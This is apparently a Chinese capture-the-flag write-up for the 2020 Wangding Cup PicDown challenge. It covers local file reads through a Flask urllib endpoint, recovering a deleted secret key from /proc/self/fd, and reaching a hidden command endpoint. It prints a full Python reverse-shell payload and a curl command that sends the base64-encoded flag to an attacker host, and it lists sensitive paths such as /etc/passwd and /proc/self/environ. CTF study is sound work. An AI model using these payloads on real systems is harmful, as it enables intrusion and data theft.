[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]
常见读取路径
/etc/passwd=====一些用户和权限还有一些乱七八糟的
/proc/self/cmdline=====包含用于开始当前进程的命令
/proc/self/cwd/app.py======当前工作目录的app.py
/proc/self/environ=====包含了可用进程的环境变量
/proc/pid/exe =====包含了正在进程中运行的程序链接;
/proc/pid/fd/ =====这个目录包含了进程打开的每一个文件的链接;
/proc/pid/mem =====包含了进程在内存中的内容;
/proc/pid/stat =====包含了进程的状态信息;
/proc/pid/statm =====包含了进程的内存使用信息。
非预期解:url=/flag 出flag
网站功能:
<html>
<meta http-equiv="refresh" content="0;url=http://www.baidu.com/">
</html>网站功能:刷新界面并跳转到百度读取passwd
读取环境变量
/proc/self/environself位置为PID:代表进程 ID(Process ID),是系统为每个正在运行的进程分配的唯一标识符若一个进程的 ID 是 1234,那么该进程的相关信息就存储在 /proc/1234 目录下
环境变量里面的 PWD=/app 这里告诉我们这是在/app目录下进行的
该环境变量表示 当前工作目录(Present Working Directory),即进程所在的文件系统路径。
/app是当前进程的根目录或应用程序的主目录(常见于容器化环境,如 Docker)。当用户在终端中执行命令时,默认操作路径即
PWD的值。
读取启动当前进程的完整命令
/proc/self/cmdline
读取app.py文件:
/proc/self/cwd/app.pycwd 代表 “Current Working Directory”(当前工作目录)from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllibapp = Flask(__name__)SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)@app.route('/')
def index():return render_template('search.html')@app.route('/page')
def page():url = request.args.get("url")try:if not url.lower().startswith("file"):res = urllib.urlopen(url)value = res.read()response = Response(value, mimetype='application/octet-stream')response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'return responseelse:value = "HACK ERROR!"except:value = "SOMETHING WRONG!"return render_template('search.html', res=value)@app.route('/no_one_know_the_manager')
def manager():key = request.args.get("key")print(SECRET_KEY)if key == SECRET_KEY:shell = request.args.get("shell")os.system(shell)res = "ok"else:res = "Wrong Key!"return resif __name__ == '__main__':app.run(host='0.0.0.0', port=8080)补充一点urllib的知识
python2中urllib的urlopen可以直接通过文件路径读取文件
漏洞所在处
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)文件描述符未关闭:代码打开文件后未显式关闭,导致文件描述符在os.remove()时可能仍处于打开状态。已删除文件的可读性:在Unix系统中,若文件被删除但有进程仍持有其文件描述符,可通过/proc访问该描述符读取内容。正常情况下应该是用f.close()
或者用with语句自动实现文件描述符的关闭
如:with open(SECRET_FILE) as f:SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE) # 确保在文件关闭后删除关于文件描述符
文件描述符是什么:
文件描述符(File Descriptor)是操作系统分配给已打开文件的“临时编号”(类似你去银行办事时拿到的排队号码)。程序通过这个编号操作文件(读/写)。
文件描述符未关闭会发生什么:
当一个程序(如 Python 脚本)打开了一个文件(如 open("/tmp/secret.txt")),但未显式调用 f.close() 或未使用 with 语句自动关闭文件时,操作系统会认为该文件仍被占用(仍然在使用中)。此时,即使代码中调用了 os.remove(SECRET_FILE) 删除了文件,实际文件内容仍可能通过未关闭的文件描述符被读取到(其内容仍会残留在磁盘上)。
我们可以通过访问/proc/self/fd/<文件描述符>来访问某个特定的文件
怎么获取这次的文件描述符:
。。。枚举
获取key
/proc/self/fd/3fd为文件描述符(file descriptors)
输入key并执行命令,但是没有回显,此时考虑到反弹shell
第一种解法:python反弹shell
注意:这里的key和shell需要经过url编码!因为key中会存在+/=等符号,需要编码后才行
编码前
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0=&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxxxxxxx",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'编码后
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D
&shell=python%20%2Dc%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22xx%2Exxx%2Exxx%2Exx%22%2C8888%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C1%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C2%29%3Bp%3Dsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%29%3B%27腾讯云服务器的一些问题
第一次整服务器遇到一些困扰我的问题,浅写一下这次是怎么解决的:
问题一:端口是4567或者3333在bp中发送请求的时候一直不行,半天没回应
换成8888,我也不知道为啥我这只有8888能成功。。。明明其他端口的防火墙都放开了。。
问题二:如图,是困扰我最久的一个
8888端口已经被占用了,一查还是宝塔面板占用的,你要是把它kill掉吧,你的宝塔面板一转头又有新的进程了,怎么杀都杀不死
杀不死咱就绕过嘛嘿嘿,宝塔面板默认端口是8888,把它改成其他的
然后8888就能正常监听啦
问题三:怎么结束监听
无意间摁了个 control+C 然后自己结束了。。?
踏马的,终于反弹出来了,终于看到这个Connection received了。遥想当年青龙组那道note题反弹了一个星期都没反弹个p出来,激动的要掉小珍珠了
第二种解法:curl反弹shell
注意还是要编码 还要base64编码输出,不编码就输出不出来(为啥)
/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D&shell=curl%20xxxx:8888/`cat%20/flag|base64`命令自己改
本题总结:
相关文章:
[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]
常见读取路径 /etc/passwd一些用户和权限还有一些乱七八糟的 /proc/self/cmdline包含用于开始当前进程的命令 /proc/self/cwd/app.py当前工作目录的app.py /proc/self/environ包含了可用进程的环境变量 /proc/pid/exe 包含了正在进程中运行的程序链接; /proc/pid…...
单纯形法之大M法
1. 问题背景与标准化 在求解某些线性规划问题时,往往难以直接找到初始的基本可行解。特别是当约束中存在等式或 “≥” 类型的不等式时,我们需要引入人工变量来构造一个初始可行解。 考虑如下标准形式问题(假设为最大化问题)&am…...
各类神经网络学习:(四)RNN 循环神经网络(下集),pytorch 版的 RNN 代码编写
上一篇下一篇RNN(中集)待编写 代码详解 pytorch 官网主要有两个可调用的模块,分别是 nn.RNNCell 和 nn.RNN ,下面会进行详细讲解。 RNN 的同步多对多、多对一、一对多等等结构都是由这两个模块实现的,只需要将对输入…...
DeepSeek 发布DeepSeek-V3-0324 版本 前端与网页开发能力、推理与多任务能力提升
DeepSeek 发布 DeepSeek-V3-0324 版本 DeepSeek 发布 DeepSeek-V3-0324 版本,在其前代模型 DeepSeek-V3 的基础上进行了显著升级。 该模型专注于中文和多语言文本生成、推理、代码编写等综合能力的提升,支持 Function Calling(函数调用&…...
航班时间 | 第九届蓝桥杯省赛C++A组
小 h 前往美国参加了蓝桥杯国际赛。 小 h 的女朋友发现小 h 上午十点出发,上午十二点到达美国,于是感叹到“现在飞机飞得真快,两小时就能到美国了”。 小 hh 对超音速飞行感到十分恐惧。 仔细观察后发现飞机的起降时间都是当地时间。 由于…...
传输层安全协议 SSL/TLS 详细介绍
传输层安全性协议TLS及其前身安全套接层SSL是一种安全传输协议,目前TLS协议已成为互联网上保密通信的工业标准,在浏览器、邮箱、即时通信、VoIP等应用程序中得到广泛的应用。本文对SSL和TLS协议进行一个详细的介绍,以便于大家更直观的理解和认…...
)
编程实现自我指涉(self-reference)
从计算机的组成原理出发,编程实现自我指涉(self-reference)本质上是通过代码操纵代码,形成逻辑上的闭环。这种能力不仅是编程语言设计中的一个奇妙现象,更是计算理论、计算机架构、乃至哲学层面的一种深刻映射。让我们…...
CentOS8 安装 Docker-CE
如果之前安装过docker,请先卸载旧版本: yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logrotate \docker-logrotate \docker-engine 安装所需的软件包: yum install -y yum-utils 添加软件源信息(设置存储库)…...
【Docker系列八】使用 Docker run 命令部署 Nginx
💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…...
【单元测试】
一、框架 不同的编程语言有不同的测试框架,以下是一些常见的测试框架: 1)Java:JUnit、TestNG2)Python:unittest、pytest3)JavaScript:Jest、Mocha4)C#:NUni…...
【今日EDA行业分析】2025年3月24日
今日 EDA 行业分析:中国在全球格局下的奋进之路 一、引言 在半导体产业的精密体系中,EDA 软件宛如一颗璀璨的明珠,其重要性不言而喻。它不仅是集成电路设计的核心支撑,更是连接芯片设计、制造、封装与测试各环节的关键纽带。今天…...
基于 PHP 内置类及函数的免杀 WebShell
前言 PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini、.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接、反射调用、加密混淆 和 伪命名空间 等手法…...
鸿蒙移动应用开发--UI组件布局
实验要求: 制作一个B站视频卡片界面,大致如下图所示,要求应用到线性布局、层叠布局等相关课堂知识。背景图、logo及文本内容不限。 实验环境 :DevEco Studio 实验过程: 步骤1:创建项目 1. 在您的开发环境…...
内核编程十二:打印内核态进程的属性
在Linux内核中,current 是一个宏,用于获取当前正在执行的进程的 task_struct 结构体指针。current 宏返回一个指向当前正在运行的进程的 task_struct 结构体的指针。通过这个指针,内核代码可以访问和修改当前进程的各种属性和状态。 打印单个…...
C++(16)—类和对象(下) ①再探构造函数
文章目录 一、构造函数初始化方式回顾二、初始化列表详解1. 初始化列表语法与特点2. 必须使用初始化列表的成员变量 三、初始化列表的底层机制四、最佳实践五、总结 一、构造函数初始化方式回顾 在C中,构造函数用于初始化对象的成员变量。传统的初始化方式是在构造…...
[新闻.AI]国产大模型新突破:阿里开源 Qwen2.5-VL-32B 与 DeepSeek 升级 V3 模型
(本文借助 Deepseek-R1 协助生成) 在2025年3月24日至25日的短短24小时内,中国AI领域迎来两大重磅开源更新:阿里通义千问团队发布多模态大模型Qwen2.5-VL-32B-Instruct,而DeepSeek则推出编程能力大幅提升的DeepSeek-V3…...
投sci论文自己查重方法
首先进入查重网站科研者之家-Home of Reasearchers 会看到里面有很多小工具(比较高级的是要付费的) 我们找到论文查重的小工具:论文查重——>英文论文自助查重系统 把论文上传...
数值分析作业插值法2
埃尔米特插值 不仅要求函数值重合,而且要求若干阶导数也重合,这种插值问题称为埃尔米特插值问题。 低次埃尔米特插值多项式 二点三次埃尔米特插值多项式 **问题描述:**给定区间 [ x 0 , x 1 ] [x_0, x_1] [x0,x1] 两端点的函数值与导数…...
宝塔docker flarum默认登录账号密码,crazymax/flarum镜像默认登录账号密码
docker flarum默认账号密码 刚创建完毕时的登录账号和密码都是flarum 来源说明 宝塔安装的这个1.8.5版本的docker flarum的版本是,用的是 Docker库 https://hub.docker.com/r/crazymax/flarum Github库 https://github.com/crazy-max/docker-flarum...
)
TailwindCSS安装教程(PostCSS)
#官方教程简直是一坨,自己跑ai查文章做出来的安装总结,作者开发环境为Vue2VueCLI# 本文为TailwindCSS3.4版本安装教程 1,安装tailwindcss3.4.1 npm install -D tailwindcss3.4.1 2, 初始化TailwindCSS配置文件 npx tailwindcss init 3&…...
电脑干货:万能驱动--EasyDrv8
目录 万能驱动EasyDrv8 功能介绍 主程序界面 驱动解压与安装 PE环境支持 系统部署环境 桌面环境一键解决方案 万能驱动8电脑版是由IT天空出品的一款智能识别电脑硬件并自动安装驱动的工具,一般又称为it天空万能驱动,万能驱动vip版,简称…...
基于Flask的通用登录注册模块,并代理跳转到目标网址
实现了用户密码的加密,代理跳转到目标网址,不会暴露目标路径,未登录的情况下访问proxy则自动跳转到登录页,使用时需要修改配置项config,登录注册页面背景快速修改,可以实现登录注册模块的快速复用。 1.app…...
 leetcode刷题)
个人学习编程(3-25) leetcode刷题
验证括号字符串: 用了两个栈来存放。 只需要考虑) 优先用 ( 其次用* 即可 #include <bits/stdc.h> using namespace std;bool checkValidString(char* s){int len strlen(s);stack<int> left_stack,star_stack;for (int i 0; i < len; i){if(s[i] (){left_st…...
vue中实现元素在界面中自由拖动
这是一个使用 Vue 2 实现可拖动 div 的示例。 <!DOCTYPE html> <html> <head><title>Vue 2 可拖动 Div</title><script src"https://cdn.jsdelivr.net/npm/vue2.6.14/dist/vue.js"></script><style>#draggable-div…...
量子计算在密码学中的应用:机遇与挑战并存
引言 在数字化时代的浪潮中,密码学作为信息安全的核心技术,始终扮演着至关重要的角色。从保护个人隐私到保障国家机密,密码学的每一次进步都为信息安全筑牢了防线。然而,随着量子计算技术的飞速发展,传统密码学体系面…...
使用go实现导入Rxcel数据到数据库并渲染到页面上
github.com/360EntSecGroup-Skylar/excelize github.com/tealeg/xlsx 可以使用以上两个库 代码如下: // jsonResult 返回 JSON 格式的结果 func (c *TemplateController) jsonResult(code int, msg string, data interface{}) {c.Data["json"] map[s…...
C++中将记录集的数据复制到Excel工作表中的CRange类CopyFromRecordset函数异常怎么捕获
文章目录 一、异常类型及捕获逻辑二、完整代码示例三、关键错误场景与解决方案1. CopyFromRecordset 返回空数据2. COM错误 0x800A03EC3. Excel进程残留4. 内存不足 四、调试与日志记录1. 启用详细日志2. 捕获错误描述3. 调试断点 五、最佳实践 在C中使用 CRange::CopyFromReco…...
使用vector构造杨辉三角形
力扣118题: 给定一个非负整数 numRows,生成「杨辉三角」的前 numRows 行。 在「杨辉三角」中,每个数是它左上方和右上方的数的和。 示例 1: 输入: numRows 5 输出: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]示例 2: 输入: numRows 1…...
conda环境下解决gitk乱码模糊
关键词 conda、git、gitk、git gui、模糊、linux、乱码 现象 操作系统:ubuntu24.04 conda版本:25.1.1 正常的终端里gitk显示不会模糊 但是在conda创建的python虚拟环境中使用gitk,字体开始变得模糊不清 分析 根据deepseek的原因原因分析…...
Contactile三轴触觉传感器:多维力感赋能机器人抓取
在非结构化环境中,机器人对物体的精准抓取与操作始终面临巨大挑战。传统传感器因无法全面感知触觉参数(如三维力、位移、摩擦),难以适应复杂多变的场景。Contactile推出的三轴触觉力传感器,通过仿生设计与创新光学技术…...